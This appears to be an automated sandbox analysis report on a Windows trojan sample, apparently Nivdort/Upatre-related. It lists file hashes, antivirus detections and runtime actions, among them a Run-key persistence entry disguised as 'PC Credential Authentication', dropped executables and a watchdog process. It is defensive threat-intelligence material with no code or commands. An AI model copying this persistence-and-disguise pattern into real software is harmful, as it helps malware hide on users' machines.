| Property | Value |
|---|---|
| Analysis Date | 2015-08-12 20:56:09 |
| MD5 | d6cd64a185269790c5ac60ace1446c01 |
| SHA1 | 90b3e7ca32ca69e1b2c635fc3222d55bf051664b |
Static Details:
| Property | Value |
|---|---|
| File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit |
| Timestamp | 2014-10-30 09:50:11 |
| Packer | Microsoft Visual C++ ?.? |
| PEhash | 8a061ab750afc6ee824aa218cf6c7c0316dfcef0 |
| IMPhash | 6b17176fedd76d9ad4b16a4331c6ef8b |

| Section | MD5 | SHA1 | Size (bytes) |
|---|---|---|---|
| .text | 65ab58ed39d82ca9febff77086099cff | d4d7096e16368f358a92cad05399e46ac14478de | 301568 |
| .rdata | 27cd77fa390a50c6da8c2f031c9d5dac | cbc641a1ffce01666e7fd44cc026e0b52e3afe01 | 34304 |
| .data | bccac870f185d3a2f1e2a81022c9afbf | 6fc2a9a6e2e3bd2c095f3fe8231fdf1a3065fc2b | 99328 |

| AV Engine | Verdict |
|---|---|
| CA (E-Trust Ino) | no_virus |
| F-Secure | Gen:Variant.Symmi.22722 |
| Dr. Web | Trojan.DownLoader11.44050 |
| ClamAV | Win.Trojan.Agent-810200 |
| Arcabit (arcavir) | Gen:Variant.Symmi.22722 |
| BullGuard | Gen:Variant.Symmi.22722 |
| Padvish | no_virus |
| VirusBlokAda (vba32) | no_virus |
| CAT (quickheal) | Trojan.Dynamer.AC3 |
| Trend Micro | TSPY_NIVDORT.SMB |
| Kaspersky | Trojan.Win32.Generic |
| Zillya! | no_virus |
| Emsisoft | Gen:Variant.Symmi.22722 |
| Ikarus | Trojan.FBAccountLock |
| Frisk (f-prot) | no_virus |
| Authentium | W32/Wonton.B.gen!Eldorado |
| MalwareBytes | Trojan.Zbot.WHE |
| MicroWorld (escan) | Gen:Variant.Symmi.22722 |
| Microsoft Security Essentials | TrojanSpy:Win32/Nivdort.BD |
| K7 | Trojan ( 004cb2771 ) |
| BitDefender | Gen:Variant.Symmi.22722 |
| Fortinet | W32/Agent.VNC!tr |
| Symantec | Downloader.Upatre!g15 |
| Grisoft (avg) | Win32/Cryptor |
| Eset (nod32) | Win32/Agent.VNC |
| Alwil (avast) | Downloader-TLD [Trj] |
| Ad-Aware | Gen:Variant.Symmi.22722 |
| Twister | Trojan.Generic.zndj |
| Avira (antivir) | TR/ATRAPS.Gen2 |
| Mcafee | Trojan-FEMT!D6CD64A18526 |
| Rising | no_virus |
Runtime Details:
Process
↳ C:\malware.exe

| Action | Target |
|---|---|
| Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\PC Credential Authentication ➝ C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.exe |
| Creates File | C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.exe |
| Creates Process | C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.exe |

Process
↳ C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.exe

| Action | Target |
|---|---|
| Creates File | C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\ylnilnkqahj.exe |
| Creates File | C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.zvstn |
| Creates File | \Device\Afd\Endpoint |
| Creates Process | WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.exe" |

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.exe"
Network Details:
Raw Pcap
Strings